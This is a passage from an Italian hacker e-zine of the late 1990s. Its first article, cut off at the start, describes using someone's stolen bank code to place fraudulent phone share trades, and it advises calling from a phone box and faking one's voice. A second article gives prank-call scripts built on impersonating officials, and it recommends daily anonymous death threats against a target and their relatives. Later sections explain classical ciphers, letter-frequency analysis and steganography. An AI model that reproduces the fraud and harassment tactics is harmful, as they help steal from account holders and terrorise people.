continuate a fantasticare ...per esempio (non sto facendo ipotesi...nooooooo)
potreste che ne so... venderle il gg dopo a 2.000 ire l'una (500.000) e poi
(sempre casualmente)chiamare la vostra banca e ordinare di comprare le azioni
della SexyShop & C. (cazzo che caso) a max 2.000 lire cosa succederebbe
secondo voi? Probabilmente il tizio a cui avete fottuto il codice si
ritroverebbe con 4.500.000 lire in meno, e voi vi trovereste con 250 azioni
pagate 2000 e vendibili sulle 20.000 :)))))))
Certo (direte voi)e se la banca si compra le azioni al posto ns xche vede che
sono convenienti? Be noi ci troveremo senza neanche una azione comprata xche
nessuno le vendera' a 2.000 lire oltre a...noi e almeno avremo rotto le balle
al tipo che ci stava sui coiones (e se non ci stava sui coiones..be...non so)
RIPETO che non so se funzia con tutte le banche e di che tipo e' sto codice
(abc 1a2b3c 12-34-56 o cosa) e poi si potrebbe obbiettare che se uno non ha
chiesto il servizio x comprare i titoli via telefono non funzierebbe...oppure
si potrebbe pensare che oltre un tot la banca non compra via telefono...
Quindi a causa di tutto cio' vi consiglio di:
- telefonare alla banca da una cabina e NON da casa vostra (chissa xche'...)
- non chiamare la banca con una voce da ultra40enne se avete 16 anni...
- non incolpare me se vi binano xche' ho fatto il disclaimer apposta :PPP

Adesso vi lascio agli altri art. ma se provate questo metodo, se funziona o
se non funziona fatemelo sapere...

Byez N0bodY88 n0body88@freemail.it

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³ ::::::::::::::::::::::::::: |
ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
³ Titolo: Scherzi Telefonici ³
ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
³ di : ElectroRipper ³
ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
³ Scritto il : xx/2/99 ³
ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
³ Pericolo: Û°°°°°°°°° ³
ÔÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ;
______________
/___/------\___\
/ \
|________|


SCHERZI TELEFONICI

di

ElectroRipper

-------------------------------------------------------------------------------

Gli scherzi telefonici possono essere usati per fare impazzire o impaurire
qualcuno che odiamo profondamente, oppure come semplice hobby (in questo
caso pero' non bisogna rompere sistematicamente il cazzo a persone che non
conosciamo, per non cadere nella bastardaggine pura).

Passiamo a vedere vari tipi di scherzo.....

- Il primo e' quello piu' scemo, usato soprattutto dai bambini, e consiste
nel dire un insulto e poi posare la cornetta. Spero proprio che non sia
anche quello preferito da voi, perche' se e' cosi' mi fate veramente
schifo (CAZZO, SIAMO NEWBIES, NON DEFICIENTI CON COMPLESSI DI INFERIORITA')

- Eccone uno un po' piu' divertente.
Allora, chiamate la vostra vittima e....

Vittima : Pronto ?
ElectroRipper : Buongiorno
Vittima : Chi e' ?
ElectroRipper : Sono un tecnico della telecom. Stiamo lavorando sulla sua
linea. Se tra un po' sente il telefono squillare non
alzi la cornetta, perche' questo potrebbe generare una
corrente di fortissima intensita' verso la mia postazione
Vittima : Ok, ho capito

Posate, aspettate 2 minuti e poi richiamate, e lasciate squillare.
Fate squillare finche' non risponde. Se ha preso veramente sul serio le
vostre parole, continuate a chiamare finche' non sara' stufo di sentir
squillare il telefono e alzera' la cornetta. A quel punto urlate piu'
che potete nel telefono (cercando di farlo sembrare un urlo di dolore
realistico). Anche se potrebbe sembrare una stronzata vi assicuro che lo
farete cagare sotto (e d'altronde se avete recitato bene all'inizio non c'e'
motivo per cui non dovrebbe pensare che a causa sua voi siete morti fulminati)

-Questo non e' uno scherzo telefonico, ma uno scherzo "citofonico", ma e'
lo stesso spassoso. In un citofono con i bottoni, premete tutti i bottoni.
Cominciate una piccola conversazione con la persona che risponde per prima, e
poi ci sara' da divertirsi (sempre che qualcuno non se ne accorge e scende
per spaccarvi le ossa :)

ElectroRipper preme tutti i bottoni.....
Risponde Rossi....

Rossi : Si ?
ElectroRipper : Buongiorno, mi puo' aprire ?
Rossi : Ma lei chi e' ?
ElectroRipper : Sono il postino

Risponde Bianchi....

Bianchi : Pronto ?
Rossi : Mi dispiace non posso aprire il portone a chi non conosco,
ultimamente ci sono stati dei furti
Bianchi : Come ??? Ma lei chi e' ?
Rossi : Come chi sono ???? Ma sei scemo ?

Rispondono Verdi e Neri...

Verdi : Pronto ?
Neri : Si ?
Verdi : Chi e' ?
Rossi : Ma allora mi stai prendendo per il culo !!
Bianchi : Andatevene o chiamo la polizia!!
Rossi : Vattene tu se no la chiamo io veramente la polizia!
Neri : Se non la finite di sfottere altro che polizia, scendo e vi
spacco il muso
Verdi : A chi spacchi il muso stronzo ?

Rispondono altri, e la faccenda diventa sempre piu' divertente....

-Uno scherzo che abbiamo fatto una volta a uno che sta nella mia stessa classe.
In orario scolastico, facendo finta di stare male o di dover fare una telefonata
a casa, o di andare in bagno, uscite dalla classe e andate ad un telefono
(spero che ci siano le cabine telefoniche nella vostra scuola,
se no la cosa diventa complicata, a meno che non abbiate un telefonino).
Chiamate a casa di un vostro amico, sperando che almeno uno dei due genitori
sia in casa, dite di essere il preside, e spiegate che un bidello ha trovato
il figlio in bagno a masturbarsi. Ovviamente una cosa del genere "non puo'
essere permessa in una scuola, e i genitori dovrebbero dare una giusta educazione
sessuale al ragazzo"
. Eheh, nella migliore delle ipotesi il poverino dovra'
passare la giornata ad ascoltare il padre che gli parla delle api e dei
fiori ;)

-Registrate una risata, e un messaggio alquanto minaccioso. Con un waveeditor
modificatela fino a farla diventare qualcosa di veramente macabro (tipo
abbassare il tono, aggiungere un eco, ecc.)
Telefonate e playate.
Da fare per cominciare a spaventare uno stronzo che vi ha fatto qualcosa di
brutto, e del quale volete vendicarvi, ovviamente poi dovra' venire la vendetta
vera e propria, ma potete sempre prima farlo impazzire telefonando continuamente
con messaggi di minaccia.

-Anziche' modificare il suono della voce, parlate con tutta calma, e telefonate
ogni giorno. Un tono calmo e formale associato ad una minaccia di morte
fa molto piu' effetto.

-Se volete proprio andarci un po' piu' pesante potete minacciare i parenti,
oppure dire qualcosa del tipo "Venerdi' alle 10 e 30 tu sarai morto", ripetendolo
ogni giorno. Venerdi' non chiamerete, ma farete in modo di fargli trovare un
biglietto con su scritto : "Oggi e' il giorno"



ElectroRipper

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°°°°°°°ÛÛ°°°°°°ÛÛ°ÛÛÛÛÛÛÛ°°°°°°°ÛÛ°°°°ÛÛ°ÛÛ°ÛÛÛÛÛ°°°°°ÛÛÛÛÛ°°°°°°°°°°°°°°°°²
²°°°°°°°°ÛÛÛ°°°°ÛÛÛ°ÛÛ²²²ÛÛ°°°°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ²²ÛÛÛ°°°Û°°°°°°°°°°°°°°°°°°°°²
²°°°°°°°°ÛÛ°Û°°Û°ÛÛ°ÛÛÛÛÛÛÛ°°°°°°°ÛÛÛÛÛÛÛÛ°ÛÛ°ÛÛ²²²²ÛÛ°°ÛÛÛ°°°°°°°°°°°°°°°°°°²
²°°°°°°°°ÛÛ°°ÛÛ°°ÛÛ°ÛÛ°ÛÛ°°°°°°°°°ÛÛ°°°°ÛÛ°ÛÛ°ÛÛ²²ÛÛÛ°°°Û°°°°°°°°°°°°°°°°°°°°²
²°°°°°°°°ÛÛ°°°°°°ÛÛ°ÛÛ°°ÛÛÛ°°ÛÛ°°°ÛÛ°°°°ÛÛ°ÛÛ°ÛÛÛÛÛ°°°°°ÛÛÛÛÛ°°°°°°°°°°°°°°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ CRITTOGRAFIA ³º
º³ /{~_~_~|ø__ø|~_~_~}\ ³º
º³ UN PO' DI TEORIA E QUALKE METODO DA UTILIZZARE X FARSI UN PROGRAMMINO ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

La crittografia spero sappiate tutti cosa sia, ma se no lo sapete essa
secondo il mio vaccabolario e' un "sistema segreto di scrittura in cifra o
codice"
. A quanti di voi verrebbe voglia di farsi un programmino in vb,
delphi, c, pascal ma non sa come cifrare i propri messaggi? In questo
articolo spieghero' alcune semplici tecniche, su una delle quali sto tentando
di fare un prog di pascal e se lo finisco presto lo allego...

--------------------------P R I M O E S E M P I O--------------------------

Allora un primo esempio di come cifrare i msg e' dato dalla scitala
lacedemonica (che???) che e' un prototipo di cifrario a trasposizione, cioe'
le lettere rimangono quelle che erano ma non dove erano.
Questo metodo nacque ben 2500 anni fa, poiche' il governo spartano
trasmetteva ai generali messaggi segreti in questo modo:
il mittente avvolge a spirale un nastro di pergamena intorno al suo bastone
cilindrico e scrive messaggi in righe longitudinali. Quando il nastro e'
srotolato, la scrittura potra' essere letta solo dalla persona che ha un
cilindro avente la stessa circonferenza. Un esempio puo' essere questo:

CLEQHACUEEHEBZESEIETLN'A

che parrebbe non significare nulla...ma provate a scrivere le lettere secondo
una (circonferenza) c = 4

C H E B E L
L A E Z I N
E C H E E '
Q U E S T A

Che ne dite? Non vi piace l'idea di nascondere le vs cose agli altri?
Si' direte voi ma questo non ci vuole tanto x scoprirlo!

------------------------S E C O N D O E S E M P I O------------------------

Allora procediamo con Cesare (che c'entra Cesare? vedrete...) il buon caro
vecchio Giulio Cesare (Ragazzi? hihihi) nella sua vita (tra il 100 e il 44
a.C) uso' un semplice metodo x crittografare i propri msg, con metodo del
cifrario additivo.
Il cifrario additivo usato da Cesare x esempio si ottiene scrivendo
l'alfabeto cifrato sotto l'alfabeto in chiaro. Il cifrato si ottiene
spostando le lettere di tot posizioni (x Cesare 3 a sinistra) come riportato
nel seguente modo:

Testo in chiaro: A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Testo cifrato: D E F G H I J K L M N O P Q R S T U V W X Y Z A B C

In questo modo se vogliamo scrivere CIAO NEWBIES scriveremo FLDR QHZELHV...
ma purtroppo i limiti di questo metodo cono evidenti a causa dello scarso
numero delle possibilita' (26) con le quali tentare di forzarlo.

PS: riporto qua sotto la lista dei possibili cifrari additivi:

a b c d e f g h i j k l m n o p q r s t u v w x y z

A A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
B B C D E F G H I J K L M N O P Q R S T U V W X Y Z A
C C D E F G H I J K L M N O P Q R S T U V W X Y Z A B
D D E F G H I J K L M N O P Q R S T U V W X Y Z A B C
E E F G H I J K L M N O P Q R S T U V W X Y Z A B C D
F F G H I J K L M N O P Q R S T U V W X Y Z A B C D E
G G H I J K L M N O P Q R S T U V W X Y Z A B C D E F
H H I J K L M N O P Q R S T U V W X Y Z A B C D E F G
I I J K L M N O P Q R S T U V W X Y Z A B C D E F G H
J J K L M N O P Q R S T U V W X Y Z A B C D E F G H I
K K L M N O P Q R S T U V W X Y Z A B C D E F G H I J
L L M N O P Q R S T U V W X Y Z A B C D E F G H I J K
M M N O P Q R S T U V W X Y Z A B C D E F G H I J K L
N N O P Q R S T U V W X Y Z A B C D E F G H I J K L M
O O P Q R S T U V W X Y Z A B C D E F G H I J K L M N
P P Q R S T U V W X Y Z A B C D E F G H I J K L M N O
Q Q R S T U V W X Y Z A B C D E F G H I J K L M N O P
R R S T U V W X Y Z A B C D E F G H I J K L M N O P Q
S S T U V W X Y Z A B C D E F G H I J K L M N O P Q R
T T U V W X Y Z A B C D E F G H I J K L M N O P Q R S
U U V W X Y Z A B C D E F G H I J K L M N O P Q R S T
V V W X Y Z

  
A B C D E F G H I J K L M N O P Q R S T U
W W X Y Z A B C D E F G H I J K L M N O P Q R S T U V
X X Y Z A B C D E F G H I J K L M N O P Q R S T U V W
Y Y Z A B C D E F G H I J K L M N O P Q R S T U V W X
Z Z A B C D E F G H I J K L M N O P Q R S T U V W X Y

--------------------------T E R Z O E S E M P I O--------------------------

Passiamo ora ad un altro metodo sul quale sto tentando di fare un programma
e se ci riesco lo metto su questo num 2 se no rimando al terzo num...
Il metodo a parola chiave corrisponde esattamente al cifrario additivo ma si
differenzia x 3 motivi (ottimi!!!):
- si utilizza una parola chiave
- si utilizzano una lettera chiave (da a a z) o un numero (da 1 a 26)
- ci sono infinite soluzioni, quindi e' difficilmente forzabile, ma non e'
impossibile...
Mettiamo ad esempio che voi abbiate scelto col vostro amico la parola chiave
(che puo' essere usata solo x questa volta o x tutti i vs msg) e che questa
risulti essere MITICO e poniamo il caso che abbiate scelto il numero 15.
Adesso vediamo come fare, prima di tutto ci posizioniamo sulla 15a lettera:

Testo in chiaro: A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Testo cifrato: ^

Dopodiche dalla 15 in poi scriviamo tutte le lettere della parola chiave
senza scrivere eventuali doppie (ovviamente):

Testo in chiaro: A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Testo cifrato: M I T C O

Come potete notare non ho ripetuto la I come sopra spiegato...a questo punto
basta inserire le altre lettere dell'alfabeto senza ovviamente quelle gia'
immesse:

Testo in chiaro: A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Testo cifrato: J K L N P Q R S U V W X Y Z M I T C O A B D E F G H

Spero che abbiate capito il metodo usato se no x chiarimenti contattatemi in
mail :)

Questo metodo imo e' abbastanza sicuro xche' ci sono infinite parole, e poi
chi ci vieta di usare come parola chiave una cosa del tipo BRCIH ?
Cmq non fidatevi troppo di questo metodo xche' se' e vero che attraverso i
soliti metodi e ' difficilmente bucabile, attraverso l'analisi statistica si
puo' sempre provare a forzare.

-------------------------Q U A R T O E S E M P I O------------------------

Una cosa semplice che pochi credono valida, ma che aiuta molto se si vuole
forzare un msg cifrato e l'uso dell'analisi statistica.
In italiano come in qualsiasi lingua le lettere appaiono con piu' o meno
frequenza, e quindi si puo' suddividerle in gruppi a seconda della loro
frequenza relativa come riportato qui sotto (ricordo che non sono dati presi
in giro e quindi potrebbero anke essere diversi, provate a leggere qualke
libro sulla crittografia o sulla matematica probabilistica (esiste come
materia?) x approfondire):

-----------------------------------------------------------------
Frequenze assolute e percentuali delle lettere singole (le
frequenze percentuali sono arrotondate alla terza cifra decimale)
-----------------------------------------------------------------

LETTERA FREQUENZA RELATIVA

A ---------------> 1714 0,114
B ---------------> 160 0,011
C ---------------> 637 0,042
D ---------------> 566 0,038
E ---------------> 658 0,111
F ---------------> 141 0,009
G ---------------> 272 0,018
H ---------------> 160 0,011
I ---------------> 1563 0,104
L ---------------> 966 0,064
M ---------------> 436 0,029
N ---------------> 966 0,064
O ---------------> 1486 0,099
P ---------------> 421 0,028
Q ---------------> 85 0,006
R ---------------> 978 0,065
S ---------------> 771 0,051
T ---------------> 1024 0,068
U ---------------> 528 0,035
V ---------------> 343 0,023
Z ---------------> 123 0,008
-----------------------------------------------------------------
Totali 14998 0,998
-----------------------------------------------------------------

Ora che avete le frequenze relative alle lettere della ns lingua :P potrete
cercare di forzare qualke codice...solo x testarne il grado di sicurezza
ovviamente {|;-)

-------------------------Q U I N T O E S E M P I O------------------------

Cifrario a grata questo sconosciuto.
Come funziona un cifrario a grata? Il modo migliore x spiegarlo e' darne un
esempio pratico. Cosa riuscite a leggere?

C T K B T P I E A F R C
I R P T E O J R G F U A
A H I W A M G A D X I E

Sembra non ci sia niente ma se vi faccio vedere quello che c'e' scritto...

C T A
R T O R F A
I G I

..capite subito :)
Di metodi ce ne sono molti,a ma che ne dite di crearne di nuovi? Se avete
qualke idea mandatemi un msg a n0body88@freemail.it e potremo collaborare a
qualche nuovo prog x cifrare e decifrare (quanto costa? na cifra....hihihi)
oppure a qualke prog x calcolare la frequenza delle lettere in un determinato
testo.

--------------------------S E S T O E S E M P I O-------------------------

Un problema, come abbiamo visto, x i metodi semplici x criptare i ns msg (ma
che puo' anke esserci d'aiuto) e' la frequenza delle lettere...ma come fare
per evitare che gli altri usino questo metodo delle possibilita' e delle
frequenze? Semplicemente bastera' annullare le frequenze assegnando ad ogni
lettera un num o + a seconda delle loro apparizioni :)

Usiamo ad esempio, un metodo con il quale i simboli dell'alfabeto cifrato
sono le cento coppie fromate da 00 a 99 come riportato qui sotto:

a : 10, 18, 25, 38, 39, 45, 49, 54, 62, 84
b : 24
c : 15, 46, 85, 88
d : 23, 31, 44, 61
e : 02, 03, 09, 17, 32, 52, 57, 69, 77 83, 87, 91, 95
f : 33
g : 76, 82
h : 89
i : 11, 19, 37, 43, 47, 48, 66, 73, 74, 81, 90, 97
j :
k :
l : 00, 20, 35, 36, 53, 68, 80
m : 22, 98
n : 04, 30, 34, 60, 64, 72
o : 08, 21, 28, 42, 58, 59, 71, 79, 92
p : 05, 06, 50
q : 94
r : 01, 26, 51, 55, 70, 75, 78
s : 12, 67, 86, 93, 96, 99
t : 13, 14, 29, 41, 56, 63
v : 07, 16, 40
w : 65
x :
y :
z : 27

Questo e' un esempio di cifrario omofonico.

Adesso devo andare che l'ultima volta i vicini si sono lamentati "xhe' alle 2
di notte sentivamo il ticchettio dei tasti della tastiera"
... poi si chiedono
xche' la gente vuole fare il referendum x l'omicidio legalizzato dei vicini
di casa...hihihihi

PS: x la cronaca in questo momento ho 5 di orale e 5 di scritto di matematica
e quindi se avete problemi scrivetemi ma mi sa che le domande toste le
girero' a qualke altro componente del NewBies Staff :) eheheh

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ STEGANOGRAFIA FOR DUMMIES ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Per chi non conoscesse la "steganografia", gli basti sapere che e' un termine
formato da due parole di origine greca "steganos"= "nascosto" e "grafos"=
"scrittura", quindi scrittura nascosta; di origine greca per il semplice
motivo che, come per la crittografia, essa ha origini antichissime e piu' tardi
con le implementazioni informatiche ha avuto uno sviluppo che supera di molto
le aspettative iniziali.
Facciamo un piccolo esempio di steganografia....per chi avesse visto "Il nome
della Rosa"
, o avesse fatto il boy-scout nulla di nuovo...prendete un foglio...
ricopiateci a penna una ricetta di Suor Germana (hihihihi!)...fatto?....siete
scemi!!! Prendete ora il foglio, uno stecchino, o meglio una stilografica vuota
e ben pulita, ed un limone.
Intingete ora, senza esagerare, la vostra "penna" nel limone e scrivete il
vostro messaggio segreto. Nella regola dovreste scrivere il messaggio tra le
righe della ricetta di Suor Germana, ma se non siete inseguiti dalla N.S.A.
vi proporrei di scrivere il vostro messaggio in fondo alla pagina. Ora prendete
un accendino e , molto delicatamente, esponete la parte di foglio in oggetto
al calore della fiamma...et voila' il vostro segreto si materializzera' nel foglio.
Vi suggerirei di sostituire il succo di limone, che emana un odore facilmente
riconoscibile, (Fra Guglielmo lo sgama!!!) con del latte ed il risultato sara'
lo stesso. Queste sostanze (latte limone ma anche altri inchiostri chimici)
sono dette inchiostri "simpatici" e lo sono davvero!!!:)
Altra tecnica steganografica (iniettiva) e' quella dell'acrostico, di origine
antichissima, si deve la sua invenzione a Epicandro che soleva iniettare
nelle sue poesie particolari messaggi che potevano venir letti isolando le
lettere iniziali dei versi in senso verticale:

Catene intorno al cielo mi
indicano stelle che non sognano piu'
All'alba di un eclissi io sogno, spero
odio. [ciao]

Facile no?
E pensare che cose simili sono state usate fino alla seconda guerra mondiale.
Torniamo a noi ed al nostro PC. Una delle tecniche maggiormente usate nel
l'ambiente informatico e' quella della steganografia sostitutiva.
Questa tecnica sfrutta il margine di errore (rumore) delle immagini e dei
suoni, sostituendo i bit meno importanti con il nostro messaggio segreto.
Prendiamo un immagine, e di questa immagine prendiamo un pixel che non sia
determinante nell'immagine.
Sostituiamo ai bit "di minor importanza" di questo colore il nostro messaggio
segreto.
Vi faccio un esempio riportando, se non sbaglio, quello di "Frank Sinapsi" mi
scuserete la lamerata ma sono a scuola e sto facendo storia dell'arte e non
me ne posso passa'!!!)
Mettiamo di aver un pixel formato dalla tripletta (RGB):
Red= 12
Green= 241
Blue= 19
Capirete che e' certamente un pixel di colore prevalentemente verde.
Traducendo in binario la nostra tripletta verrebbe:
12= 00001100
241=11110001
19= 00010011
Arrivati a questo punto prendiamo i nostri bit meno importanti, che capirete
sono quelli alla vostra destra (nell'es. 0-1-1). Ipotizziamo ora di voler
nascondere il nostro messaggio che in sequenza binaria e' 1-0-0. Cosi' facendo
la nostra tripletta mutera' in questo modo 13-240-18, sara' pertanto impossibile,
vista la lieve modifica (sono sempre proporzionati ed il verde e' sempre
padroneggiante), notare il cambiamento a occhio nudo pur avendo l'originale a
portata di mano (8cchi).
Questa e', molto semplicemente, la tecnica adoperata nella maggior parte dei
programmi di steganografia.
Se vi state chiedendo a cosa possa servirvi tutto questo sappiate che in alcuni
paesi la crittografia e' illegale perche' attenta alla sicurezza nazionale
(fottetevi!), sappiate che c'e' sempre qualcuno che vi guarda e che se avesse
soltanto il sospetto che voi usiate la crittografia potrebbe avere automaticamente
la certezza che voi nascondiate qualcosa di pericoloso per lui, per voi e per
tutti quelli che hanno speso la loro vita a farsi i cazzi degli altri(!!).
Se faro' in tempo troverete allegato a questo articolo un simpatico programmino,
S-Tools 4, e se ce la faro' anche il manuale tradotto.
Se N0body & C. crederanno che sia il caso di approfondire un po' l'argomento
potrei fare un articolo un po' piu' tecnico nel prossimo numero e magari vi
alleghero' anche il progetto della mia stilografica al latte :)))

Comunque come sempre, tutto quello che ho scritto e' solo per "educational
purpouse only"
quindi non mi ritengo responsabile se davvero copiate la
ricetta di Suor Germana (hahahahahah!!!)
Per commenti e considerazioni varie
nietzsche@angelfire.com
nietx@yahoo.it

ciao e a presto!!!
Nietzsche
"Solo chi ha il chaos dentro puo' partorire una stella danzante"
F.W.N.

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ STEGANOGRAFIA CON IL PROGRAMMA IME ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

...Ragazzi qui stiamo parlando di steganografia..per maggiorni informazioni
vale sempre la grande regola cercate, cercate, cercate...un piccolo suggerimento
ve lo do'...Frank Sinapsi da Kriptonite....non e' molto semplice ma spiega
perfettamente di cosa stiamo parlando.
Il file allegato e' IME 47,6 K [non vorrei che N0bodY88 avesse fatto qualche
scherzo :)))hihihi] un programmino non certo nuovo generato da un hacker di
nome Christian, non e' sicuramente uno dei migliori ma e' molto facile, veloce
e funziona bene. Serve per crittare e nascondere messaggi in un'immagine (JPG).
Vi ho tradotto l'help anche se era davvero una stronzata....notate bene che non
supporta il fullpath (quindi immagine e messaggio devono risiedere nella cartella
dove avete copiato il programmino) e vi suggerisco di non provare a nascondere
le vostre chiavi in quel modo (se non ricordo male ci ho provato ma con
risultati deludenti). Un bug credo l'abbia, cioe', in caso di messaggi davvero
corti anche nel caso si immettesse una password errata ci fara' vedere il testo
in chiaro...ma badate bene che questo programma serve per non far sapere a
nessuno se non al nostro interlocutore che ci stiamo scambiando messaggi e
non foto di Pamela Anderson :) altrimenti con un brute force il nostro lavoro
avrebbe sicuramente vita breve.....esercitatevi con le foto che sono in allegato
e se riuscite...bhe' lo vedrete da voi........ ...vi auguro buon divertimento
e come al solito per commenti etc nietzsche@angelfire.com
Nietzsche

Image Mesage Encryptor ver 1.0 by Christian -Freeware-

usate: IME <comando> [nomeimmagine.jpg] [password] [nomefileditesto.txt]
comandi:
c --> viene usato per creare una nuova immagine con il messaggio
r --> viene usato per estrarre il messaggio da una immagine
p --> verrebbe usato per purificare l'immagine dal messaggio ma
in questa versione non e' possibile


per esempio: per aggiungere un messaggio (segreto.txt) in una immagine chiamata
pic1.jpg dovrete usare il comando: "ime c pic1.jpg pippo(hahaha) segreto.txt"
(senza visgolette). Il Programma creera' una copia, nella directory di IME, del
l'immagine originale nominata CRYPTED.jpg, che conterra' il messaggio crittato
estratto dal file di testo (segreto.txt).
Per leggere un messaggio da un' immagine usate il comando
"ime r pic1.jpg pippo"
Ime estrarra' nella sua directory il messaggio nascosto nell'immagine e lo
chiamera' MESSAGE.txt. L'ultima funzione "p" che occorre per ripulire l'immagine
dal messaggio non e' implementata in questa versione.

"Di cio' di cui non vi e' piu' nulla da dire e' meglio tacere" -L.V.Wittgenstain-

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ CRITTOGRAFIA FOR DUMMIES ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

NASCONDETEVI DAL MONDO IN 6 MINUTI E 54 SECONDI NETTI

Perche' usare la crittografia?
Bhe' se non te lo sei mai chiesto a ben poco serve questo articolo, se invece
hai sempre avuto l'esigenza di nascondere le tue chiappe al mondo perche' sei
uno spacciatore di droga o un MR. Hide, o "i cazzi sono i miei e non deve
leggerli nessuno"
, allora la crittografia e' l'isola che cercavi.

Quale?
Come quale? Forse ti riferisci al sistema? (parlo da solo!!!!)
La crittografia, o meglio gli algoritmi che la rendono possibile, si dividono
in due filoni quelli a chiave simmetrica e asimmetrica.
Quelli ha chiave simmetrica permettono al mittente ed al destinatario di
usare la stessa chiave per crittare e decrittare un testo. Il problema piu'
grande che viene a crearsi con questo metodo valido e veloce, a mio parere,
solo per l'archiviazione di dati, e' quello di potersi scambiare la chiave.
Infatti, non sempre e' possibile incontrare materialmente il nostro
